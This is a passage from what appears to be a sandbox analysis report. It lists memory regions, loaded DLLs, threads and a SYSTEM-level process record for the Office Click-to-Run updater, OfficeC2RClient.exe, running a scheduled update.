0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3361 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3362 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3363 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3364 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3365 start_va = 0x2230000 end_va = 0x230efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002230000" filename = "" Region: id = 3366 start_va = 0x2930000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 3367 start_va = 0x7fefba20000 end_va = 0x7fefba37fff entry_point = 0x7fefba20000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3368 start_va = 0x7fefbe50000 end_va = 0x7fefbea5fff entry_point = 0x7fefbe50000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Thread: id = 193 os_tid = 0xb90 Thread: id = 194 os_tid = 0x628 Thread: id = 195 os_tid = 0xaf4 Thread: id = 203 os_tid = 0x508 Thread: id = 204 os_tid = 0x6c0 Thread: id = 205 os_tid = 0x4f8 Thread: id = 206 os_tid = 0x788 Thread: id = 207 os_tid = 0x310 Process: id = "28" image_name = "officec2rclient.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe" page_root = "0x3e61d000" os_pid = "0xae0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x350" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\" /update SCHEDULEDTASK displaylevel=False" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2d7" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3291 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3292 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3293 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3294 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3295 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3296 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3297 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3298 start_va = 0x13f200000 end_va = 0x140242fff entry_point = 0x13f200000 region_type = mapped_file name = "officec2rclient.exe" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe") Region: id = 3299 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3300 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3301 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3302 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3584 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3585 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3586 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3593 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3594 start_va = 0x2f0000 end_va = 0x356fff entry_point = 0x2f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3595 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 3596 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3597 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3598 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3599 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3600 start_va = 0x7fef79c0000 end_va = 0x7fef79c6fff entry_point = 0x7fef79c0000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 3601 start_va = 0x7fef7fa0000 end_va = 0x7fef801bfff entry_point = 0x7fef7fa0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 3602 start_va = 0x7fef8320000 end_va = 0x7fef8395fff entry_point = 0x7fef8320000 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 3603 start_va = 0x7fef83e0000 end_va = 0x7fef83e2fff entry_point = 0x7fef83e0000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 3604 start_va = 0x7fef83f0000 end_va = 0x7fef83f2fff entry_point = 0x7fef83f0000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 3605 start_va = 0x7fef8400000 end_va = 0x7fef8402fff entry_point = 0x7fef8400000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 3606 start_va = 0x7fef8410000 end_va = 0x7fef8412fff entry_point = 0x7fef8410000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 3607 start_va = 0x7fef8420000 end_va = 0x7fef8424fff entry_point = 0x7fef8420000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 3608 start_va = 0x7fef8430000 end_va = 0x7fef8434fff entry_point = 0x7fef8430000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 3609 start_va = 0x7fef8440000 end_va = 0x7fef8442fff entry_point = 0x7fef8440000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 3610 start_va = 0x7fef8450000 end_va = 0x7fef84ecfff entry_point = 0x7fef8450000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 3611 start_va = 0x7fef84f0000 end_va = 0x7fef84f3fff entry_point = 0x7fef84f0000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 3612 start_va = 0x7fef8500000 end_va = 0x7fef8503fff entry_point = 0x7fef8500000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 3613 start_va = 0x7fef8510000 end_va = 0x7fef8512fff entry_point = 0x7fef8510000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 3614 start_va = 0x7fef8520000 end_va = 0x7fef8523fff entry_point = 0x7fef8520000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 3615 start_va = 0x7fef8530000 end_va = 0x7fef8532fff entry_point = 0x7fef8530000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll") Region: id = 3616 start_va = 0x7fef8540000 end_va = 0x7fef8542fff entry_point = 0x7fef8540000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 3617 start_va = 0x7fef8550000 end_va = 0x7fef8552fff entry_point = 0x7fef8550000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3618 start_va = 0x7fef8560000 end_va = 0x7fef8562fff entry_point = 0x7fef8560000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 3619 start_va = 0x7fef8570000 end_va = 0x7fef8572fff entry_point = 0x7fef8570000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll") Region: id = 3620 start_va = 0x7fef8580000 end_va = 0x7fef8582fff entry_point = 0x7fef8580000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 3621 start_va = 0x7fef8590000 end_va = 0x7fef8681fff entry_point = 0x7fef8590000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll") Region: id = 3622 start_va = 0x7fef8690000 end_va = 0x7fef8693fff entry_point = 0x7fef8690000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 3623 start_va = 0x7fef86a0000 end_va = 0x7fef86b6fff entry_point = 0x7fef86a0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 3624 start_va = 0x7fef86c0000 end_va = 0x7fef86dafff entry_point = 0x7fef86c0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3625 start_va = 0x7fef8a30000 end_va = 0x7fef8a56fff entry_point = 0x7fef8a30000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 3626 start_va = 0x7fef8bc0000 end_va = 0x7fef8c10fff entry_point = 0x7fef8bc0000 region_type = mapped_file name = "concrt140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll") Region: id = 3627 start_va = 0x7fef8c20000 end_va = 0x7fef8c3dfff entry_point = 0x7fef8c20000 region_type = mapped_file name = "hlink.dll" filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll") Region: id = 3628 start_va = 0x7fefb0d0000 end_va = 0x7fefb0dafff entry_point = 0x7fefb0d0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 3629 start_va = 0x7fefb880000 end_va = 0x7fefb890fff entry_point = 0x7fefb880000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3630 start_va = 0x7fefbc30000 end_va = 0x7fefbe44fff entry_point = 0x7fefbc30000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 3631 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3632 start_va = 0x7fefd680000 end_va = 0x7fefd6b9fff entry_point = 0x7fefd680000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3633 start_va = 0x7fefd6c0000 end_va = 0x7fefd6d9fff entry_point = 0x7fefd6c0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3634 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3635 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f5fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3636 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3637 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3638 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3639 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3640 start_va = 0x7fefde50000 end_va = 0x7fefebd7fff entry_point = 0x7fefde50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3641 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3642 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3643 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3644 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3645 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3646 start_va = 0x7feff650000 end_va = 0x7feff826fff entry_point = 0x7feff650000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3647 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4007 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4008 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4009 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 4010 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 4011 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 4012 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 4013 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4014 start_va = 0x490000 end_va = 0x617fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 4015 start_va = 0x620000 end_va = 0x7a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 4016 start_va = 0x7b0000 end_va = 0x86ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 4017 start_va = 0x870000 end_va = 0xc62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 4018 start_va = 0xd50000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 4019 start_va = 0xdd0000 end_va = 0x109efff entry_point = 0xdd0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4020 start_va = 0x10a0000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 4021 start_va = 0x11b0000 end_va = 0x11bffff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 4022 start_va = 0x1300000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 4023 start_va = 0x1590000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 4024 start_va = 0x7feeb820000 end_va = 0x7feeb901fff entry_point = 0x7feeb820000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 4025 start_va = 0x7fef8b20000 end_va = 0x7fef8bbffff entry_point = 0x7fef8b20000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 4026 start_va = 0x7fefa940000 end_va = 0x7fefa9e6fff entry_point = 0x7fefa940000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 4027 start_va = 0x7fefba20000 end_va = 0x7fefba37fff entry_point = 0x7fefba20000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4028 start_va = 0x7fefc6f0000 end_va = 0x7fefc6fbfff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4029 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4030 start_va = 0x7fefd4d0000 end_va = 0x7fefd50cfff entry_point = 0x7fefd4d0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4031 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4032 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4033 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4034 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 4035 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4036 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4037 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4038 start_va = 0x1e0000 end_va = 0x1e7fff entry_point = 0x1e0000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 4039 start_va = 0x460000 end_va = 0x461fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4040 start_va = 0x470000 end_va = 0x473fff entry_point = 0x470000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 4041 start_va = 0xc70000 end_va = 0xc73fff entry_point = 0xc70000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 4042 start_va = 0xc80000 end_va = 0xc80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 4043 start_va = 0xc90000 end_va = 0xc90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 4044 start_va = 0xca0000 end_va = 0xcaffff 